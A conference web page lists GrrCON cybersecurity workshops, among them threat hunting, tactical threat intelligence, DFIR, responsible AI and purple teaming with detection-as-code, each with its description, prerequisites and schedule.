Skip to content
GrrCON

Workshops

In addition to registration below, all Workshops have 10 seats available for walk-ins, though NOT guaranteed.

 

ThreatOps Challenge

 

Description: Join your fellow cybersecurity peers in a race focused on identifying attack vectors, TTPs, and IOCs. This competition will be facilitated by SentinelOne engineers on the SentinelOne Singularity platform. No SentinelOne experience required–an orientation will be provided to align your threat hunting skills and prepare you for the competition. Demonstrate your skills, resilience, and prowess as a true and effective Threat Hunter to earn fabulous prizes (and CPEs)! Bring your own laptop with a wifi connection to participate..

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

Date/Time:

Thursday Sept 28th 1-4pm  – SOLD OUT
Friday Sept 29th 10am-1pm







 

Beyond Advanced Intel: Making your threat intelligence tactical

 

Description: Congratulations! You have just been hired as your company’s intelligence analyst. Your leadership team would like to know more about your company’s threat landscape and how to better invest their time and resources to tackle the threats the company is facing. You are now responsible for helping to answer this question. Traditionally, most intel analysts would tackle this question by looking externally at the larger cyber threat landscape. We need to shift this thinking to more tactical intelligence. Threat intelligence teams should look internally at incident response cases and security tool outputs to determine the threat landscape. Finding cyber-attack patterns, determining where security tools could be improved, and providing context on what attacks are happening against the company can help leadership invest in the right security solutions and teams. Traditional intelligence training hasn’t focused on this more tactical approach to intelligence. This training is designed to help bridge that gap. This is a mix of classroom instruction, OSINT gathering, and writing. It is designed to build skills no matter which systems you are using. Whether you are a team of one or part of a larger group, just starting out or well experienced this training will provide you with skills that you can start using right away.

Pre-reqs and requirements:

• Attendees must bring a laptop with wireless connection capabilities.
• Notepad and pen are encouraged.

 

Date/Time:

Thursday Sept 28th
10am – 4pm



 

 

Intro to DFIR – Divide and Conquer

 

Description: A big challenge when learning about how to investigate endpoints and servers is keeping track of all of the artifacts that you need to consider. It’s a daunting list.

In our new incident response training course, you’ll learn Dr. Brian Carrier’s systematic approach to endpoint investigations and how to apply it: the “Divide & Conquer” process. This approach focuses on breaking down big, vague investigative questions, such as “is there malicious user activity?” into smaller and smaller questions that can ultimately be answered by a category of artifacts, such as “Login Events.” The goal is to make a simple, mental model of the important questions and artifact categories.

In this free course, you’ll learn…
1. A framework for categorizing artifacts that may contain DFIR evidence
2. How to analyze those artifact categories
3. Benefits of an automated approach.

It’s vendor agnostic, but Cyber Triage is used as a reference tool. Whether you’re new to this space or a vet, this course will help ensure you’re tackling your next endpoint investigation with state-of-the-art techniques.

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

Date/Time:

Thursday Sept 28th 1-4pm




 

 

Say Yes to ChatGPT: Creating and Maintaining Responsible AI

 

Description: In this 4 hour workshop, participants will explore the tenants of creating, managing, and developing responsible Artificial Intelligence solutions and capabilities within an organization. Learn how to communicate, educate, and implement capabilities in a way that your board, executive team, and general user audience can understand and leverage to move forward.

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

Date/Time:

Friday Sept 29th 10am-2pm




 

 

Purple Teaming with Detection-as-Code for Modern SIEM

 

Description: One of the challenges for security teams is writing and deploying detections that generate actionable alerts with rich context while also reducing noisy alerts. This hands-on workshop will teach the fundamentals of Purple Teaming and detection-as-code to help build new detections.

This session will show how to leverage Purple team techniques to develop hypotheses for new detections and strengthen their defenses against future attacks.

I will show how to use open-source offensive security tools to simulate attacks against lab infrastructure and use an investigative approach to learn and build new detections & manage them using detection-as-code principles to eliminate noise and false positives.

Who should attend?

This hands-on virtual workshop is perfect for detection & security teams who are expected to develop and write detections to support new log sources, threat models, and vulnerabilities that are exploited in the wild

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

• Detections are written in Python so some Python experience would be helpful

Date/Time:

Thursday Sept 28th 10am-noon